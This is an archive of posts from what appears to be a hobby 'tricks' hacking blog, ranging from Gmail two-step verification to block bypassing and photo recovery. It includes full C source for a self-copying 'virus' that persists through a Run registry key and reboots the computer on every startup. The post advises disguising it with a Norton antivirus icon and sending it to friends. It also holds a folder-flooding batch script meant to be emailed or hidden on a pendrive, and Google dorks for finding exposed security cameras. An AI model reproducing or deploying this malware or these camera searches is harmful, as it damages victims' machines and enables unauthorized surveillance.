Archive for the ‘Tricks’ Category

Most of the people use Gmail for sending emails. We have precious information stored in our Gmail account. So Gmail would be the target for hackers being hacking it. Gmail developer team has given us wonderful security option by enabling the 2-step Verification,

By enabling the 2-step verification from you Gmail account makesyour account more secure by making you to login into Gmail by 2 step. While logging in into the Gmail account, Gmail send you the security code to your mobile phone and asks you to enter that code in Gmail login page. This makes sure that only the mobile phone carrier can able to know that code. So your account cannot be Hacked if someone tries to hack your account from somewhere else.

How to enable 2-step verification

  • Log in to your Gmail Account,
  • Click Account at the top right,
  • Click Edit on 2-step verification,
  • Now Click Start Setup,
  • selcet your country and add your mobile number,
  • Select the method of verification, SMS option is by default and it is most recommended one
  • Just click Send Code
  • Now Google will send you Text in your mobile with Verification Code
  • Now click Next, and NextNote this point after 2-step Verification
  • Your Another Application and Connected account will not be working, you need to re-invoke that on Final 2-step Verification or do it later!
  • If your Primary Moblie is lost then you cannot able to login to Gmail so set Backup Mobile Number
  • Backup Verification Code is the another way to Recover your Account Please Download and Note that number and keep it safely somewhere it is accessible for you, like your Wallet. Each code can be used only once.
  • I recommend you to read everything and make a note of it.

Happy with your safe Gmail Account. This time none can Hack your Gmail, I hope. Please comment below and also mention me if I have missed any point.

8 ways to access blocked websites

Posted: May 23, 2013 in Tricks

images

 

1. Using IP instead of URL

2. Redirection with short URL service

3. Google cache

Search engines like Google and Yahoo cache webpages and these cached pages are stored in search engines themselves, which likely will be added to the blocked list. Click on the ‘cache’ will bring you to a cache version of the page, as updated as how Google caches it.

4. Internet Archive – Wayback Machine

Wayback Machine is a internet service that periodically keeps a copy of almost all websites in the Internet way from the date they’re started. Clicking on the latest copy of what Wayback Machine have should be somewhat similar to the real site.

5. Anonymous surfing

– Hidemyass.com
– anonymizer.com
– wujie.net
– ultrareach.net

6. Use Proxy in Browsers

7. Bypass with translation services

Use Google translate. Open Google translate ,type the URL and translate page.

8. Retrieve web pages via Email

 

Any problem comment it…………

 

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again. It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE 2. Goto

X:\Windows\System

(X can be C,D,E or F) 3.You will find a file by name sysres.exe, delete it. 4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

How to lock without any sw?

——————————————————————————————————————

1.copy the below code.

**********************************************************
cls
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo **Folder Locker by http://freehacktech.blogspot.com**
echo ………………………………………………
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo **Folder Locker by http://freehacktech.blogspot.com**
echo ………………………………………………
echo Enter password to Unlock folder
set/p “pass=>amol”
if NOT %pass%== amol321 goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

2. create new text file and pest this code inside.

3. find the code this line”type your password”. This remove and type your pwd.

4. and save lock.bat extension and save anywhere u want

5.double click on this lock.bat file

6.When u double click on this file lock folder is automatically created. After creating this folder add files any u want and click on lock.bat file. So it will be ask u are u want lock ur folder type y then press enter, that means lock ur folder. this folder no any can see.

7. Now unlock this folder click on lock.bat file and type ur password to unlock ur folder.

8.enjoy it.

If you any problem type comment box you problem can I try to solve it.

Thank u.

 

@echo off
:top
md %random%
goto top

Type above code in notepad and save it with name something.bat. send it to friend via E-mail or Hide it and upload it in pendrive.

NOTE:- Don’t Open in your pc.

1] Open Notepad.exe

2] Click File>Save As..>

3] locate the folder where ur undeletable file is

4] Choose ‘All files’ from the file type box

5] click once on the file u wanna delete so its name appears in the ‘filename’ box

6] put a ” at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

7] Cick save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal…

Like It………………Guys.

you want use stylish code on chating on facebook

Go on this link

http://www.i2symbol.com/chat/facebook-chat-code-generator

try it

deletefixphoto2_134x180

If you have accidentally deleted photos in your Digital camera , no need to worry, here is the way to recover you photos.

DeleteFIX Photo is the only program designed specifically for digital photo recovery, it will recover photos deleted from your digital camera.

It is the only photo recovery Software in the market that recovers every photo format from every digital camera. Each camera saves the photos in a different format, and DeleteFIX Photo is able to recover deleted photos from all of them, including specific formats for professional cameras from every brand, such as Canon, Olympus, Pentax and others.

How to recover the deleted photos?

  • Download and install DeleteFIX Photo.
  • Connect your camera to your computer.
  • Run the software and follow the simple instructions in the program’s window. View how thisdigital photo recovery software works with images.
  • View the recovered photos in the program’s viewer window.
  • Click on the “Activate” button in the program itself to obtain the activation code. That way you will be able to save your photos to your computer.

The DeleteFix Photo can also recover video and photo files from your digital camera, memory caradsUSB Devices and more.

Download the DeleteFix Photo from http://www.cimaware.com/main/products/deletefixphoto.php

HELLO GUYZ DAVID REX HERE TO TEACH YOU HOW TO HACK SECURITY CAMERA USING GOOGLE DORK.
#PLEASE DONATE SOME MONEY TO US (EASY JUST CLICK AND VIEW THE LINK I GIVE YOU)
DONT WORRY ITS SAFE
1)http://bit.ly/UXJfVx
2)http://bit.ly/UXJfVx

NOW LETS START THE TUTORIAL
1) YOU NEED TO HIDE YOUR IP (FOR SAFETY) .IF YOU DIDNT SAFE ALSO CAN 😀
2) COPY ANY OF THE DORK BELOW AND PASTE IN GOOGLE SEARCH .
3) DONT COPY THE (*)
😀

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
 * intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
 * intitle:”i-Catcher Console – Web Monitor”

BitMiner

Posted: April 22, 2013 in Tricks
BitMiner
The Easy Miner

This library uses an integrated DiabloMiner to deliver high-performance BitCoin mining on the BTCMine pool.

This software was created by Thomas Nappo (Jire) and Daniel Biocchi (Garƴ). It works on any common operating system (such as Windows, Mac, Linux, and Solaris).

http://dl.dropbox.com/u/26438996/BitMiner.zipImage